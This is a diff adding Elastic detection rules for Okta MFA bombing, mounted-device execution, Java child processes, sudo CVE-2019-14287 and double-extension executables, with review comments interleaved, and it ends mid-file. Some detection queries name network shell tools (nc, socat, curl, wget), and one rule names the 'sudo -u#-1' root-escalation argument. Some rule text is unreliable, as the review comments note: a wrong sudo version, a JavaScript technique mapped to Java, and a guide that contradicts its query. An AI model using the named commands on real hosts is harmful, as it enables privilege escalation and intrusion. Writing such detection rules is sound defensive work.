@@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.", + "event_category_override": "event.category", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Okta MFA Bombing via Push Notifications", + "note": "## Triage and analysis\n\n### Investigating Potential Okta MFA Bombing via Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. 
Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.\n", + "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\"\n and okta.event_type == \"user.mfa.okta_verify.deny_push\"] with runs=5\n until [authentication where event.dataset == \"okta.system\"\n and (okta.event_type: (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n", + "references": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd", + "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "severity": "high", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1621", + "name": "Multi-Factor Authentication Request Generation", + "reference": "https://attack.mitre.org/techniques/T1621/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json new file mode 100644 index 00000000000..9eb4e98da73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json 
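Review bot: The investigation guide in `note` does not describe the query it accompanies: it says the rule fires after a user "denies MFA Okta Verify push notifications twice" and that the events "should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action", but the `query` requires `with runs=5` denials and accepts any of `user.authentication.sso`, `user.authentication.auth_via_mfa`, `user.authentication.verify` or `user.session.start` with `okta.outcome.result == "SUCCESS"`. Suggested wording: `This rule detects when a user denies Okta Verify push notifications five times, followed by a successful authentication event (SSO, MFA, verify or session start) within a 10-minute window.` Separately, this rule sets no `from`, unlike the other rules in this diff that use `now-9m`; with a 10-minute `maxspan` a lookback shorter than the sequence window may miss the earlier denials, so confirm the intended schedule.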
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from a Mounted Device", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and 
default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "8a1d4831-3ce6-4859-9891-28931fa6101d_107", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json new file mode 100644 index 00000000000..35a307cf8f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json 
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from a Mounted Device", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` 
and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8a1d4831-3ce6-4859-9891-28931fa6101d_108", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json new file mode 100644 index 00000000000..8217ebbba7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious JAVA Child Process", + "new_terms_fields": [ + "host.id", + "process.command_line" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious Java Child Process\n\nThis rule identifies a suspicious child process of the Java interpreter process. It may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a Java specific vulnerability.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further 
post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and event.type:(\"start\" or \"process_started\") and process.parent.name:\"java\" and process.name:(\n bash or dash or sh or tcsh or csh or zsh or ksh or fish or python* or php* or perl or ruby or lua* or openssl or\n nc or netcat or ncat or telnet or awk or socat or wget or curl\n) and process.args :(\n whoami or id or uname or cat or hostname or ip or curl or wget or pwd or ls or cd or python* or php* or perl or\n ruby or lua* or openssl or nc or netcat or ncat or telnet or awk or socat\n)\n", + "references": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/christophetd/log4shell-vulnerable-app", + "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf", + "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", + "https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "8acb7614-1d92-4359-bfcf-478b6d9de150_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json new file mode 100644 index 00000000000..64b7e2bcf08 --- /dev/null 
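Review bot: The ATT&CK mapping under `threat` lists subtechnique `T1059.007` (JavaScript), but this rule matches child processes of the `java` interpreter that are shells and scripting interpreters (`bash`, `sh`, `python*`, `perl`, ...), none of which is JavaScript; Java and JavaScript are unrelated, so the subtechnique should be removed in favour of the parent `T1059` or replaced with one that describes the matched children, such as `T1059.004` (Unix Shell). The `setup` text is also copied from the EQL rules ("If enabling an EQL rule on a non-elastic-agent index ..."), whereas this rule is `"type": "new_terms"` with `"language": "kuery"`; reword it to `If enabling this rule on a non-elastic-agent index ...` so the `event.ingested` guidance still reads correctly.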
+++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command \"sudo -u#-1\" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Sudo Privilege Escalation via CVE-2019-14287", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"sudo\" and process.args == \"-u#-1\"\n", + "references": [ + "https://www.exploit-db.com/exploits/47502" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8af5b42f-8d74-48c8-a8d0-6d14b4197288", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Use Case: Vulnerability", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "8af5b42f-8d74-48c8-a8d0-6d14b4197288_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json new file mode 100644 index 00000000000..0df94945915 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107.json 
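Review bot: The `description` in this hunk states `This exploit may work for sudo versions prior to v1.28.`, which is not a sudo release; CVE-2019-14287 was fixed in sudo 1.8.28, so the sentence should read `This exploit may work for sudo versions prior to 1.8.28.` As written it points triage at the wrong patch baseline when checking whether a host was actually exposed. Separately, this rule keeps the broad `logs-endpoint.events.*` index pattern while the other rule revisions in this diff narrow to per-dataset patterns such as `logs-endpoint.events.process-*`, which would be the matching pattern for this `process where` query.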
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable File Creation with Multiple Extensions", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will 
not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.007", + "name": "Double File Extension", + "reference": "https://attack.mitre.org/techniques/T1036/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json new file mode 100644 index 00000000000..c5bff9715be --- /dev/null 
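Review bot: The `file.name regex~` alternation in the `query` lists `txt` twice (`pptx?|txt|rtf` and `hta|txt|img`), and the trailing `not process.executable : ("/bin/sh", "/usr/sbin/MailScanner", "/usr/bin/perl")` clause can never match because the query is already restricted to `host.os.type == "windows"`; both look like leftovers from a Linux rule. Dropping the duplicate and the dead exclusion keeps the rule easier to audit without changing what it matches. The same query is carried unchanged into `8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json` in the next hunk, which only narrows the index pattern to `logs-endpoint.events.file-*`, so the cleanup applies there too.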
+++ b/packages/security_detection_engine/kibana/security_rule/8b2b3a62-a598-4293-bc14-3d5fa22bb98f_108.json 
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable File Creation with Multiple Extensions", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"exe\" and\n file.name regex~ \"\"\".*\\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\\.exe\"\"\" and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Users\\\\*\\\\QGIS_SCCM\\\\Files\\\\QGIS-OSGeo4W-*-Setup-x86_64.exe\") and\n file.path : \"?:\\\\Program Files\\\\QGIS *\\\\apps\\\\grass\\\\*.exe\") and\n not process.executable : (\"/bin/sh\", \"/usr/sbin/MailScanner\", \"/usr/bin/perl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8b2b3a62-a598-4293-bc14-3d5fa22bb98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents 
